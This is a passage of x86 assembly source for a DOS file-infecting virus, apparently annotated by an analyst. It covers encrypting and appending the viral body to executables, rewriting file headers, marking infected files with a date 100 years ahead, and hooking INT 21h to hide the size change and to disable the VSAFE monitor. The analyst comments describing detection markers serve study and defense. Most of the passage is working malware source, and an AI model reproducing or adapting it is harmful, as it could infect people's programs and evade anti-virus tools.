; per copy, fixed byte signatures have to target the decrypted body or the
; structural markers (size, date, header fields) instead.
ZAV26:    mov ax,dx                     ; generate decryptor
          mov cx,1600d
          push dx
          mov dx,0e00h
          call MDEVICE
          pop dx
          mov byte ptr ds:[CODETP-START],bh ; decryption type
          mov word ptr ds:[ASIZEVIR-START],ax ; write counter
          mov word ptr ds:[NCDX-START],cx ; key
          add dx,ax
          mov word ptr ds:[START+1h-START],dx ; FLEXIBLE ENTRY point.
; NOTE(analysis): writing the appended copy. The byte at AAAX+1h is reset to
; 04h in the image before it is encrypted, then the file pointer is moved to
; end of file and the generated decryptor (CX bytes at 0E00h) is written.
          mov byte ptr ds:[AAAX+1h-START],04h
;---------------------
          push ax
          mov bx,word ptr ds:[AKTHNDL-START]
          mov ax,4202h                  ; lseek end
          xor cx,cx
          xor dx,dx
          pushf
          call dword ptr ds:[HPVECT21-START]
          pop cx
          jnc OPKOD
          jmp ZAVENW
;---------------------
OPKOD:    mov ah,40h                    ;WRITE decryptor
          mov dx,0e00h
          pushf
          call dword ptr ds:[HPVECT21-START]
          jnc OPKOD1
          jmp ZAVENW
;---------------------
; NOTE(analysis): 3200 bytes starting at offset 0 of the resident segment are
; transformed word by word with the key in NCDX and written out in 200h-byte
; chunks through the buffer at 0E00h. CODETP selects the operation: 0 = XOR,
; 1 = SUB, above 1 = ADD. The author's tags on the ADD/SUB lines name the
; inverse operation, i.e. what the decryptor has to apply.
OPKOD1:   xor cx,cx                     ; encrypt body and append it to end
          mov dx,3200d                  ; size of body
          xor si,si
          mov di,0e00h
;---------------------
ZAV27S:   mov ax,word ptr ds:[si]
          cmp byte ptr ds:[CODETP-START],1h
          jz ZAV28
          jnc ZAV27
          xor ax,word ptr ds:[NCDX-START] ;XOR
          jmp ZAV29
ZAV27:    add ax,word ptr ds:[NCDX-START] ;SUB
          jmp ZAV29
ZAV28:    sub ax,word ptr ds:[NCDX-START] ;ADD
;---------------------
ZAV29:    mov word ptr ds:[di],ax
          sub dx,2h
          add word ptr ds:[ASIZEVIR-START],2h
          add di,2h
          add si,2h
          add cx,2h
          cmp dx,0h
          jnz ZAV29AX
          jmp ZAV29AY
ZAV29AX:  cmp cx,200h
          jnz ZAV27S
;---------------------
ZAV29AY:  push dx
          mov ah,40h                    ; write to file
          mov dx,0e00h
          pushf
          call dword ptr ds:[HPVECT21-START]
          pop dx
          jc ZAVENW
          cmp dx,0h
          jz ZAV30
          mov di,0e00h
          mov cx,0h
          jmp ZAV27S
;---------------------
; NOTE(analysis): filler. 200h bytes are copied from segment 0000h at an
; offset taken from the low word of the BIOS tick count (INT 1Ah/AH=00h,
; capped at 0FEFFh); part of that block is then written as padding so the
; appended data totals 0E00h bytes. The tail of an infected file therefore
; holds arbitrary low-memory contents, not code.
ZAV30:    push ds                       ; generate additional bytes
          push bx
          mov ah,0h
          int 1ah
          cmp dx,0feffh
          jc ZAV30TY
          mov dx,0feffh
ZAV30TY:  mov si,dx
          mov ax,0h
          mov ds,ax
          mov di,0e00h
          mov cx,200h
          rep movsb
          pop bx
          pop ds
          mov cx,0e00h                  ; pad virus to 3,5 kB.
; NOTE(analysis): padding length = 0E00h - ASIZEVIR, so every infected file
; grows by exactly 0E00h (3584) bytes regardless of the decryptor's length.
          sub cx,word ptr ds:[ASIZEVIR-START]
          mov dx,0e00h
          mov ah,40h
          pushf
          call dword ptr ds:[HPVECT21-START]
          jc ZAVENW
;---------------------
          mov ax,4200h                  ; lseek start 0
          xor cx,cx
          xor dx,dx                     ; 2 years ago we didn't use cwd :)
          pushf
          call dword ptr ds:[HPVECT21-START]
          jc ZAVENW
;---------------------
; NOTE(analysis): the first 1Ch bytes of the file are overwritten with the
; modified TABHEAD image (new EXE header, or the 0E9h jump for a COM file).
                                        ;Write 1c bytes to file start
          mov ah,40h
          mov cx,1ch
          mov dx,offset TABHEAD-START
          pushf
          call dword ptr ds:[HPVECT21-START]
          jc ZAVENW
;---------------------
; NOTE(analysis): infection marker. The original time is kept and 64h (100)
; is added to the year field of the DOS date (bits 9-15); month and day are
; preserved. A .COM/.EXE whose date is a century ahead of its neighbours and
; whose size is 3584 bytes larger than a known-good copy matches this marker.
          mov cx,word ptr ds:[TIMEHP-START] ; mark DATE = DATE +100 years
          mov dx,word ptr ds:[DATEHP-START]
          push dx
          shr dx,9h
          add dx,64h
          shl dx,9h
          pop ax
          and ax,0000000111111111b
          or dx,ax
          mov ax,5701h
          pushf
          call dword ptr ds:[HPVECT21-START]
          jc ZAVENW
;---------------------
ZAVENW:   mov ah,3eh                    ;Close handle.
          mov bx,word ptr cs:[AKTHNDL-START]
          pushf
          call dword ptr cs:[HPVECT21-START]
;---------------------
; NOTE(analysis): clean-up, also reached when a write failed: the temporary
; svl.svl is renamed back to the saved EXEC path and the original attributes
; (ATR) are restored. The return codes of these two calls are not checked.
ZAVRENM:  call ANLPATH                  ; rename SVL.svl back to original
          push cs
          pop ds
          mov di,si
          mov si,offset DTX4-START
          mov cx,0fh
          rep movsb
          mov dx,0e00h
          mov di,word ptr cs:[REGDX-START]
          mov es,word ptr cs:[REGDS-START]
          mov ah,56h
          pushf
          call dword ptr cs:[HPVECT21-START]
;---------------------
          push es                       ; restore attribs
          pop ds
          push di
          pop dx
          mov ax,4301h
          mov cx,word ptr cs:[ATR-START]
          pushf
          call dword ptr cs:[HPVECT21-START]
          jmp ZAVEVSF
;-----------------------------------------------------------------------
;-----------------------------------------------------------------------
ZAVECHNDL:mov ah,3eh
          mov bx,word ptr cs:[AKTHNDL-START]
          pushf
          call dword ptr cs:[HPVECT21-START]
;---------------------
; NOTE(analysis): VSAFE options saved in PARAMVS are written back, then the
; saved registers are restored and the original EXEC request is passed on.
ZAVEVSF:  mov dx,5945h                  ; restore VSAFE.
          mov ax,0fa02h
          mov bl,byte ptr cs:[PARAMVS-START]
          int 21h
ZAVE:     pop es
          pop ds
          popa
          jmp SIENDCE
;-------------------------------------------------------------------------
;-------------------------------------------------------------------------
SIEND2:   cmp ax,4202h                  ;fn. LSEEK
          jz LLLH                       ; want they file size or what ?
; NOTE(analysis): size stealth for "seek to end" (AX=4202h with CX:DX = 0),
; the usual way a program measures a file through a handle. Any other request
; is passed to the original handler at SIENDCE.
          jmp SIENDCE
LLLH:     cmp cx,0h
          jz LLLH1
          jmp SIENDCE
LLLH1:    cmp dx,0h
          jz OOPR
          jmp SIENDCE
;---------------------
; NOTE(analysis): the real seek is performed first and its DX:AX result saved.
; The size is reduced by 0E00h only if (a) the handle's date carries the
; year>=64h marker and (b) FINDSTR returns CF set for the current process
; name. FINDSTR comes from an include that is not on this page; presumably
; CF set means the caller is a recognised anti-virus program, so only such
; callers are shown the smaller size - confirm against FINDSTR.inc.
OOPR:     popf
          pushf
          call dword ptr cs:[HPVECT21-START]
          jc SSSE
          pushf
          pusha
          push es
          push ds
;---------------------
          mov word ptr cs:[STEASZAX-START],ax ; save file size
          mov word ptr cs:[STEASZDX-START],dx
          mov ax,5700h                  ; check date
          pushf
          call dword ptr cs:[HPVECT21-START]
          jc SSSRE
          shr dx,9h                     ; is file infected ? ( + 100 years).
          cmp dx,64h
          jc SSSRE
;---------------------
          mov ah,62h                    ;Test for AV activity
          pushf
          call dword ptr cs:[HPVECT21-START]
          dec bx
          push ds
          mov ds,bx
          mov si,08h
          call FINDSTR
          pop ds
          jnc SSSRE
;---------------------
; 32-bit subtraction of 0E00h from the saved DX:AX, done by hand.
          mov ax,word ptr cs:[STEASZAX-START] ; LSEEK end -3,5kB.
          mov dx,word ptr cs:[STEASZDX-START]
          cmp ax,0e00h
          jz SSS1
          jc SSS3
          sub ax,0e00h
          jmp SSS2
SSS3:     dec dx
          mov cx,0ffffh
          mov bx,0e00h
          sub bx,ax
          sub cx,bx
          inc cx
          mov ax,cx
          jmp SSS2
SSS1:     mov ax,0h
SSS2:     mov word ptr cs:[STEASZAX-START],ax
          mov word ptr cs:[STEASZDX-START],dx
;---------------------
SSSRE:    pop ds
          pop es
          popa
          popf
          mov ax,word ptr cs:[STEASZAX-START]
          mov dx,word ptr cs:[STEASZDX-START]
FLEG4:    sti
SSSE:     retf 0002h
;-------------------------------------------------------------------------
;-------------------------------------------------------------------------
; Pass-through: restore the flags saved at SIZESTE and chain to the original
; INT 21h handler.
SIENDCE:  popf
          jmp dword ptr cs:[HPVECT21-START]
;-------------------------------------------------------------------------
; NOTE(analysis): short delay loop executed by the loader between the jump
; from START and the self-modifying write at AAAY.
TRACE1:   mov cx,10d
TRACE2:   dec cx
          jnz TRACE2
          jmp AAAY
;***************************************************************************
; NOTE(analysis): the four include files below are not part of this page;
; the listing cannot be assessed completely (or assembled) without them.
include FINDSTR.inc
include ANLPATH.inc
include MDEVICE.inc
include TXT.inc
END